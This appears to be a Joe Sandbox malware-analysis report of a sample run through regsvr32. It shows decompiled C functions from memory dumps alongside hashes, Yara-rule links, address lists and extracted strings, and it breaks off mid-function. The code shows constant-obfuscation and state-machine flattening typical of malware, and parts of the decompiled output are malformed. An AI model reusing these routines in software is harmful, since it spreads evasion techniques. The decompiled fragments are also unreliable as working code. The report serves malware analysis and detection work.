Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
API String ID: 0-1112794312
Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction ID: c7d9e56a90b098496788f2ab1adcfdc6e5d91e1230c803872d60727f96b72392
Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction Fuzzy Hash: CDC111715083808FD368CF66C549A2FBBE1FBC5748F108D1DF69A96260D7B29949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040EDC71, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040EDC71() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t246;
				intOrPtr* _t248;
				signed int _t254;
				intOrPtr _t255;
				intOrPtr* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t290;
				signed int* _t294;

				_t294 =  &_v108;
				_v28 = 0x1aa6a3;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x8001aa6b;
				_v68 = 0xf966b1;
				_v68 = _v68 | 0xf5f58fdd;
				_v4 = 0;
				_t290 = 0xa5173af;
				_t257 = 0x26;
				_v68 = _v68 / _t257;
				_v68 = _v68 ^ 0x0679357b;
				_v108 = 0xb8ff00;
				_v108 = _v108 | 0x28c12dd3;
				_t258 = 0x42;
				_v108 = _v108 / _t258;
				_v108 = _v108 + 0x2548;
				_v108 = _v108 ^ 0x0093f641;
				_v80 = 0x4a20cb;
				_v80 = _v80 | 0x50657e73;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x00ac2c39;
				_v84 = 0x6237d1;
				_v84 = _v84 ^ 0x87c50ead;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x7a73b039;
				_v88 = 0x617a8;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x00004866;
				_v96 = 0x113f2;
				_v96 = _v96 + 0x334b;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0x0285e17a;
				_v96 = _v96 ^ 0x08b84672;
				_v60 = 0x4bd9b6;
				_v60 = _v60 ^ 0x6ba7848f;
				_v60 = _v60 | 0xa40fa4df;
				_v60 = _v60 ^ 0xefe49c55;
				_v100 = 0xb12c48;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0d420031;
				_t259 = 0x33;
				_v100 = _v100 / _t259;
				_v100 = _v100 ^ 0x004184fb;
				_v104 = 0x387c2e;
				_v104 = _v104 << 5;
				_t260 = 0x72;
				_v104 = _v104 / _t260;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x0003fa0e;
				_v64 = 0x9254d3;
				_v64 = _v64 ^ 0xec8ec683;
				_v64 = _v64 + 0xffff5a55;
				_v64 = _v64 ^ 0xec1fa99d;
				_v72 = 0xb608b;
				_v72 = _v72 + 0xffffc85a;
				_t261 = 0x43;
				_v72 = _v72 / _t261;
				_v72 = _v72 ^ 0x00012617;
				_v32 = 0x2b47af;
				_t262 = 0x73;
				_t254 = _v4;
				_v32 = _v32 / _t262;
				_v32 = _v32 ^ 0x0007dbbc;
				_v76 = 0xa2cc58;
				_v76 = _v76 * 0x79;
				_v76 = _v76 + 0x1556;
				_v76 = _v76 ^ 0x4cf4e816;
				_v36 = 0x411f8a;
				_v36 = _v36 ^ 0x039a7593;
				_v36 = _v36 ^ 0x03d0076c;
				_v48 = 0x32f559;
				_v48 = _v48 + 0x88cf;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c1178;
				_v92 = 0xe53134;
				_v92 = _v92 + 0xffffd6c4;
				_v92 = _v92 + 0xfffff637;
				_v92 = _v92 ^ 0x9e819fd3;
				_v92 = _v92 ^ 0x9e661668;
				_v52 = 0x962c48;
				_v52 = _v52 + 0x54df;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x096c20fe;
				_v56 = 0x38983;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x1e2e8742;
				_v56 = _v56 ^ 0x1f9fc20c;
				_v20 = 0x39c3;
				_v20 = _v20 ^ 0xdc0c04ea;
				_v20 = _v20 ^ 0xdc0d303f;
				_v44 = 0xdd799f;
				_v44 = _v44 + 0xffffa96c;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0003bcd5;
				_v24 = 0x7b2b38;
				_v24 = _v24 * 0x48;
				_v24 = _v24 ^ 0x22aaeece;
				_v40 = 0x38897c;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0xf4a0afb0;
				_v40 = _v40 ^ 0xf4ac49e4;
				_v12 = 0x92ab49;
				_v12 = _v12 ^ 0x4b1e6875;
				_v12 = _v12 ^ 0x4b80c344;
				_v16 = 0x5228cc;
				_v16 = _v16 | 0xaae3d00d;
				_v16 = _v16 ^ 0xaaf963f0;
				while(1) {
					L1:
					_t263 = 0x5c;
					while(1) {
						_t246 = 0xc02063;
						do {
							L3:
							while(_t290 != 0x13579) {
								if(_t290 == _t246) {
									_t248 = E040F298D(_v20, _v44, _v24, _v8, _t254);
									_t294 =  &(_t294[3]);
									__eflags = _t248;
									_t290 = 0x13579;
									_v4 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t290 == 0x79b4c83) {
										_push(_v88);
										_push(_v84);
										_push(_v80);
										__eflags = E040D2DEA(_v96,  &_v8, _v60, 0x40d10a0, _v28, _v100, 0x40d10a0, 0x40d10a0, _v104, _v64, 0x40d10a0, 0x40d10a0, _v68, _v72, _v32, _v76, _v36, E040EE1F8(0x40d10a0, _v108, __eflags));
										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
										E040EFECB(_t249, _v48, _v92, _v52, _v56);
										_t294 =  &(_t294[0x16]);
										L16:
										_t246 = 0xc02063;
										_t263 = 0x5c;
									} else {
										if(_t290 == 0xa5173af) {
											_t290 = 0xac8592e;
											continue;
										} else {
											if(_t290 == 0xac8592e) {
												_t255 =  *0x40f6214; // 0x0
												_t256 = _t255 + 0x23c;
												while( *_t256 != _t263) {
													_t256 = _t256 + 2;
													__eflags = _t256;
												}
												_t254 = _t256 + 2;
												_t290 = 0x79b4c83;
												_t246 = 0xc02063;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							E040D53D0(_v40, _v12, _v16, _v8);
							_t290 = 0x61b9dc3;
							goto L16;
							L17:
							__eflags = _t290 - 0x61b9dc3;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}

0x040edc71
0x040edc74
0x040edc7e
0x040edc85
0x040edc8d
0x040edc95
0x040edca1
0x040edca5
0x040edcb0
0x040edcb5
0x040edcbb
0x040edcc3
0x040edccb
0x040edcd7
0x040edcdc
0x040edce2
0x040edcea
0x040edcf2
0x040edcfa
0x040edd02
0x040edd07
0x040edd0f
0x040edd17
0x040edd1f
0x040edd24
0x040edd2c
0x040edd34
0x040edd39
0x040edd3e
0x040edd46
0x040edd4e
0x040edd56
0x040edd5b
0x040edd63
0x040edd6b
0x040edd73
0x040edd7b
0x040edd83
0x040edd8b
0x040edd93
0x040edd98
0x040edda4
0x040edda9
0x040eddaf
0x040eddb7
0x040eddbf
0x040eddc8
0x040eddcd
0x040eddd3
0x040eddd8
0x040edde0
0x040edde8
0x040eddf0
0x040eddf8
0x040ede00
0x040ede08
0x040ede14
0x040ede17
0x040ede1d
0x040ede2a
0x040ede38
0x040ede3b
0x040ede3f
0x040ede43
0x040ede4b
0x040ede58
0x040ede5c
0x040ede64
0x040ede6c
0x040ede74
0x040ede7c
0x040ede84
0x040ede8c
0x040ede94
0x040ede99
0x040edea1
0x040edea9
0x040edeb1
0x040edeb9
0x040edec1
0x040edec9
0x040eded1
0x040eded9
0x040edede
0x040edee6
0x040edef3
0x040edef7
0x040edeff
0x040edf07
0x040edf0f
0x040edf17
0x040edf1f
0x040edf27
0x040edf2f
0x040edf34
0x040edf3c
0x040edf49
0x040edf4d
0x040edf55
0x040edf5d
0x040edf62
0x040edf6a
0x040edf72
0x040edf7a
0x040edf82
0x040edf8a
0x040edf92
0x040edf9a
0x040edfa2
0x040edfa2
0x040edfa4
0x040edfa5
0x040edfa5
0x040edfaa
0x00000000
0x040edfaa
0x040edfb8
0x040ee0a0
0x040ee0a7
0x040ee0aa
0x040ee0ac
0x040ee0b4
0x00000000
0x040edfbe
0x040edfc4
0x040ee001
0x040ee00a
0x040ee00e
0x040ee065
0x040ee082
0x040ee085
0x040ee08a
0x040ee0d6
0x040ee0d8
0x040ee0dd
0x040edfc6
0x040edfcc
0x040edffa
0x00000000
0x040edfce
0x040edfd4
0x040edfda
0x040edfe0
0x040edfeb
0x040edfe8
0x040edfe8
0x040edfe8
0x040edff0
0x040edff3
0x040edfa5
0x00000000
0x040edfa5
0x040edfd4
0x040edfcc
0x040edfc4
0x00000000
0x040edfb8
0x040ee0cd
0x040ee0d4
0x00000000
0x040ee0de
0x040ee0de
0x040ee0de
0x040ee0f1
0x040ee0f1
0x040edfa5

Strings

1, xrefs: 040EDD98
fH, xrefs: 040EDD3E
s~eP, xrefs: 040EDCFA
.|8, xrefs: 040EDDB7
H%, xrefs: 040EDCE2
41, xrefs: 040EDEA1
8+{, xrefs: 040EDF3C

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .|8$1$41$8+{$H%$fH$s~eP
API String ID: 0-3664284304
Opcode ID: dd433377a01c2af9f3053e6c8785069e55ffe841da5518721324ae6fea9824b2
Instruction ID: 731eb095d3c801d8dca8300ac3280b150ce7af53c8a34eecb063333c0857ec8b
Opcode Fuzzy Hash: dd433377a01c2af9f3053e6c8785069e55ffe841da5518721324ae6fea9824b2
Instruction Fuzzy Hash: F0B131725083809FD368CF25D88A41BFBE2FBC4748F10891DF29A96260D7B99959CF47

Uniqueness

Uniqueness Score: -1.00%

Function 040D670B, Relevance: 9.0, Strings: 7, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040D670B() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t233;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				intOrPtr _t259;
				void* _t261;
				void* _t266;
				void* _t268;

				_v576 = 0x5c6bdc;
				_v572 = 0xae866a;
				_t259 = 0;
				_t261 = 0xb8e9ee3;
				_v568 = 0;
				_v612 = 0xec3aec;
				_t5 =  &_v612; // 0xec3aec
				_t241 = 0x62;
				_v612 =  *_t5 * 0x6c;
				_v612 = _v612 | 0xdabeec40;
				_v612 = _v612 ^ 0xfbbeff50;
				_v604 = 0x37b038;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x000001bc;
				_v624 = 0x7f5f56;
				_v624 = _v624 + 0xffff5a99;
				_v624 = _v624 << 4;
				_v624 = _v624 ^ 0x07eb9ef3;
				_v628 = 0x55d92;
				_v628 = _v628 >> 0x10;
				_v628 = _v628 ^ 0x0529ff2d;
				_v628 = _v628 ^ 0x052de72a;
				_v664 = 0x989cfa;
				_v664 = _v664 * 0x6a;
				_v664 = _v664 | 0x8da787ac;
				_v664 = _v664 + 0xffffc08b;
				_v664 = _v664 ^ 0xbfb72d66;
				_v672 = 0x5126c1;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x6300e881;
				_v672 = _v672 * 0x1d;
				_v672 = _v672 ^ 0xbca67a4e;
				_v636 = 0x3defe6;
				_t49 =  &_v636; // 0x3defe6
				_v636 =  *_t49 * 9;
				_t51 =  &_v636; // 0x3defe6
				_v636 =  *_t51 * 0x52;
				_v636 = _v636 ^ 0xb28641ab;
				_v632 = 0xea2077;
				_t56 =  &_v632; // 0xea2077
				_v632 =  *_t56 * 0x65;
				_v632 = _v632 << 2;
				_v632 = _v632 ^ 0x7174f9be;
				_v660 = 0x2cce37;
				_v660 = _v660 << 0xd;
				_v660 = _v660 / _t241;
				_v660 = _v660 << 4;
				_v660 = _v660 ^ 0x1917ca80;
				_v676 = 0x92ca3e;
				_t242 = 0x12;
				_v676 = _v676 * 0x4b;
				_v676 = _v676 << 0xf;
				_v676 = _v676 >> 2;
				_v676 = _v676 ^ 0x28034127;
				_v596 = 0xf7772a;
				_v596 = _v596 + 0xffff3df8;
				_v596 = _v596 ^ 0x00fc52ab;
				_v644 = 0x6698d1;
				_v644 = _v644 | 0xc199dbe0;
				_v644 = _v644 ^ 0xc1fcc133;
				_v592 = 0x7143e7;
				_v592 = _v592 >> 2;
				_v592 = _v592 ^ 0x0010b3e1;
				_v652 = 0x9a4189;
				_v652 = _v652 * 0x60;
				_v652 = _v652 / _t242;
				_v652 = _v652 ^ 0x033cbda1;
				_v668 = 0xc5fab;
				_v668 = _v668 << 0xb;
				_v668 = _v668 >> 9;
				_v668 = _v668 + 0x8f67;
				_v668 = _v668 ^ 0x0031c4ff;
				_v600 = 0x6e8ee8;
				_v600 = _v600 ^ 0x0d880c60;
				_v600 = _v600 ^ 0x0deba949;
				_v616 = 0xb65c97;
				_v616 = _v616 + 0xffff6050;
				_v616 = _v616 << 6;
				_v616 = _v616 ^ 0x2d666d98;
				_v640 = 0xcc6d21;
				_t243 = 0x1b;
				_v640 = _v640 / _t243;
				_v640 = _v640 >> 0xe;
				_v640 = _v640 ^ 0x000eaea1;
				_v680 = 0x87d5f6;
				_t244 = 0x76;
				_v680 = _v680 * 0x1f;
				_v680 = _v680 << 9;
				_v680 = _v680 + 0xffff990b;
				_v680 = _v680 ^ 0xe5dd4258;
				_v608 = 0xe96961;
				_v608 = _v608 | 0xb6f9188e;
				_v608 = _v608 ^ 0xb6fb8930;
				_v656 = 0xc61929;
				_v656 = _v656 >> 2;
				_v656 = _v656 + 0xcacc;
				_v656 = _v656 << 2;
				_v656 = _v656 ^ 0x00c38b27;
				_v648 = 0x21afdf;
				_v648 = _v648 + 0x614;
				_v648 = _v648 + 0x692f;
				_v648 = _v648 ^ 0x002627a2;
				_v620 = 0xc6d0;
				_v620 = _v620 + 0xee3f;
				_t240 = _v608;
				_v620 = _v620 / _t244;
				_v620 = _v620 ^ 0x0005d3ba;
				do {
					while(_t261 != 0x885c2e) {
						if(_t261 == 0x1fa5b7d) {
							_t244 = _v628;
							_t233 = E040F0DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
							_t268 = _t268 + 0xc;
							__eflags = _t233;
							if(__eflags != 0) {
								_t261 = 0x6c35f0b;
								continue;
							}
						} else {
							if(_t261 == 0x4edc737) {
								_push(_t244);
								_t236 = E040EDBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
								_t258 = _v680;
								_t244 = _v640;
								asm("sbb esi, esi");
								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
								E040F1538(_t244, _t258, _t240);
								_t268 = _t268 + 0x1c;
								goto L14;
							} else {
								if(_t261 == 0x6c35f0b) {
									_t258 = _v636;
									_t244 =  &_v524;
									_t238 = E040F45CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
									_t240 = _t238;
									_t268 = _t268 + 0x30;
									__eflags = _t238 - 0xffffffff;
									if(__eflags != 0) {
										_t261 = 0x4edc737;
										continue;
									}
								} else {
									if(_t261 == 0x8f2e6fb) {
										_t239 = E040D5477(_t244);
										_t266 = _v588 - _v548;
										asm("sbb ecx, [esp+0x9c]");
										__eflags = _v584 - _t258;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t259 = 1;
												__eflags = 1;
											} else {
												__eflags = _t266 - _t239;
												if(_t266 >= _t239) {
													goto L19;
												}
											}
										}
									} else {
										if(_t261 != 0xb8e9ee3) {
											goto L14;
										} else {
											_t261 = 0x1fa5b7d;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t259;
					}
					_t244 = _v608;
					E040ECA1F(_t244, _v656,  &_v588, _v648, _v620);
					_t268 = _t268 + 0xc;
					_t261 = 0x8f2e6fb;
					L14:
					__eflags = _t261 - 0x203d9a3;
				} while (__eflags != 0);
				goto L20;
			}

0x040d6711
0x040d671b
0x040d6727
0x040d6729
0x040d672e
0x040d6735
0x040d673d
0x040d6744
0x040d6747
0x040d674b
0x040d6753
0x040d675b
0x040d6763
0x040d6768
0x040d6770
0x040d6778
0x040d6780
0x040d6785
0x040d678d
0x040d6795
0x040d679a
0x040d67a2
0x040d67aa
0x040d67b7
0x040d67bb
0x040d67c3
0x040d67cb
0x040d67d3
0x040d67db
0x040d67e0
0x040d67ed
0x040d67f1
0x040d67f9
0x040d6801
0x040d6806
0x040d680a
0x040d680f
0x040d6813
0x040d681b
0x040d6823
0x040d6828
0x040d682c
0x040d6831
0x040d6839
0x040d6841
0x040d684e
0x040d6852
0x040d6857
0x040d685f
0x040d686c
0x040d686d
0x040d6871
0x040d6876
0x040d687b
0x040d6883
0x040d688b
0x040d6893
0x040d689b
0x040d68a3
0x040d68ab
0x040d68b3
0x040d68bb
0x040d68c0
0x040d68c8
0x040d68d5
0x040d68df
0x040d68e5
0x040d68f2
0x040d68fa
0x040d68ff
0x040d6904
0x040d690c
0x040d6914
0x040d691c
0x040d6924
0x040d692c
0x040d6934
0x040d693c
0x040d6941
0x040d6949
0x040d6957
0x040d695c
0x040d6962
0x040d6967
0x040d696f
0x040d697c
0x040d697d
0x040d6981
0x040d6986
0x040d698e
0x040d6996
0x040d699e
0x040d69a6
0x040d69ae
0x040d69b6
0x040d69bb
0x040d69c3
0x040d69c8
0x040d69d0
0x040d69d8
0x040d69e0
0x040d69e8
0x040d69f0
0x040d69f8
0x040d6a06
0x040d6a0a
0x040d6a0e
0x040d6a16
0x040d6a16
0x040d6a24
0x040d6afb
0x040d6aff
0x040d6b04
0x040d6b07
0x040d6b09
0x040d6b0b
0x00000000
0x040d6b0b
0x040d6a2a
0x040d6a30
0x040d6aa5
0x040d6ac1
0x040d6ac6
0x040d6acc
0x040d6ad3
0x040d6adb
0x040d6ae1
0x040d6ae6
0x00000000
0x040d6a32
0x040d6a38
0x040d6a7b
0x040d6a81
0x040d6a88
0x040d6a8d
0x040d6a8f
0x040d6a92
0x040d6a95
0x040d6a9b
0x00000000
0x040d6a9b
0x040d6a3a
0x040d6a40
0x040d6b45
0x040d6b4e
0x040d6b59
0x040d6b60
0x040d6b62
0x040d6b64
0x040d6b6a
0x040d6b6c
0x040d6b6c
0x040d6b66
0x040d6b66
0x040d6b68
0x00000000
0x00000000
0x040d6b68
0x040d6b64
0x040d6a46
0x040d6a4c
0x00000000
0x040d6a52
0x040d6a52
0x00000000
0x040d6a52
0x040d6a4c
0x040d6a40
0x040d6a38
0x040d6a30
0x040d6b6d
0x040d6b79
0x040d6b79
0x040d6b25
0x040d6b2a
0x040d6b2f
0x040d6b32
0x040d6b37
0x040d6b37
0x040d6b37
0x00000000

Strings

/i, xrefs: 040D69E0
Cq, xrefs: 040D68B3
?, xrefs: 040D69F8
=, xrefs: 040D6801
w , xrefs: 040D6823
:, xrefs: 040D673D
ai, xrefs: 040D6996

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /i$?$ai$w $:$Cq$=
API String ID: 0-170593755
Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction ID: 5bcf88daded2ac9e790b1512ec0d2a51123c45cafe004732648c7e34915a4a04
Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction Fuzzy Hash: DEB121725083809FC368CF65C58950BFBE1BBC5758F008A1DF5E9A6220D3B69959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000A803, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10057a08; // 0x3643b451
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
					E10009BC7(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10017D62(_t39));
					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10017D62(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10017D62(__eflags)) = _t34;
					} else {
						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x1000a803
0x1000a803
0x1000a803
0x1000a803
0x1000a80c
0x1000a813
0x1000a816
0x1000a81e
0x1000a826
0x1000a89a
0x1000a89c
0x00000000
0x00000000
0x1000a89e
0x1000a828
0x1000a835
0x1000a836
0x1000a83b
0x1000a83e
0x1000a83e
0x1000a83f
0x1000a845
0x1000a84c
0x1000a85c
0x1000a871
0x1000a873
0x1000a878
0x1000a87b
0x1000a8a5
0x1000a87d
0x1000a884
0x1000a889
0x1000a8aa
0x1000a8bf
0x1000a8bf
0x1000a8b0
0x1000a8b7
0x1000a8b7
0x1000a8c1
0x1000a8c2
0x1000a8c2
0x1000a8cf

APIs

_strcpy_s.LIBCMT ref: 1000A830

Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC

Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62

__snprintf_s.LIBCMT ref: 1000A869

Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
LoadLibraryA.KERNEL32(?), ref: 1000A8B7

Strings

LOC, xrefs: 1000A828

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1

Uniqueness

Uniqueness Score: -1.00%

Function 040E4A66, Relevance: 7.8, Strings: 6, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E040E4A66() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				void* _t271;
				void* _t272;
				intOrPtr _t277;
				intOrPtr _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t289;
				intOrPtr _t294;
				intOrPtr _t311;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr _t325;
				signed int* _t327;
				void* _t330;

				_t327 =  &_v640;
				_v532 = 0x9eda53;
				_v528 = 0x2697e4;
				_t289 = 0xd8634eb;
				_t325 = 0;
				_v524 = 0;
				_v580 = 0x257a8f;
				_v580 = _v580 + 0xffff0a69;
				_t317 = 0x46;
				_v580 = _v580 / _t317;
				_v580 = _v580 ^ 0x00008592;
				_v556 = 0x213626;
				_t16 =  &_v556; // 0x213626
				_t318 = 0x3f;
				_v556 =  *_t16 * 0x37;
				_v556 = _v556 ^ 0x0722a203;
				_v564 = 0xc854a8;
				_v564 = _v564 >> 0xd;
				_v564 = _v564 ^ 0x000f067d;
				_v568 = 0x3071d1;
				_v568 = _v568 + 0xffff48c8;
				_v568 = _v568 ^ 0x002621f6;
				_v548 = 0x47fca2;
				_v548 = _v548 ^ 0x7cca96d7;
				_v548 = _v548 ^ 0x7c82555f;
				_v624 = 0xc0bc8e;
				_v624 = _v624 | 0x773eab6a;
				_v624 = _v624 + 0x32c;
				_v624 = _v624 + 0xe315;
				_v624 = _v624 ^ 0x77fb7a9a;
				_v544 = 0x592636;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0xc9333252;
				_v572 = 0x38b1a;
				_v572 = _v572 ^ 0xe2d962db;
				_v572 = _v572 ^ 0xe2dfc1be;
				_v592 = 0x205e14;
				_v592 = _v592 + 0xffffa7ef;
				_v592 = _v592 + 0xffff7efd;
				_v592 = _v592 ^ 0x001a340d;
				_v540 = 0xa56fb;
				_v540 = _v540 ^ 0x6fafefe0;
				_v540 = _v540 ^ 0x6fae5e5f;
				_v616 = 0x18df03;
				_v616 = _v616 >> 6;
				_v616 = _v616 + 0x4bd4;
				_v616 = _v616 * 0xb;
				_v616 = _v616 ^ 0x000ee45e;
				_v632 = 0xf97e7d;
				_v632 = _v632 >> 0xe;
				_v632 = _v632 << 1;
				_v632 = _v632 >> 8;
				_v632 = _v632 ^ 0x0007c205;
				_v588 = 0x1ac705;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 | 0x5b484d5d;
				_v588 = _v588 ^ 0x5b49b1bf;
				_v608 = 0xcfa712;
				_v608 = _v608 << 0xb;
				_v608 = _v608 + 0xffff02b3;
				_v608 = _v608 / _t318;
				_v608 = _v608 ^ 0x01ff3be8;
				_v600 = 0x40b8c7;
				_v600 = _v600 >> 0xe;
				_v600 = _v600 + 0xffff3f18;
				_v600 = _v600 ^ 0xffff31b4;
				_v560 = 0xb86873;
				_v560 = _v560 * 0x79;
				_v560 = _v560 ^ 0x572fdc31;
				_v596 = 0x3e642a;
				_t319 = 0x51;
				_v596 = _v596 / _t319;
				_t320 = 0x15;
				_v596 = _v596 / _t320;
				_v596 = _v596 ^ 0x00087e57;
				_v636 = 0x2d2a20;
				_t132 =  &_v636; // 0x2d2a20
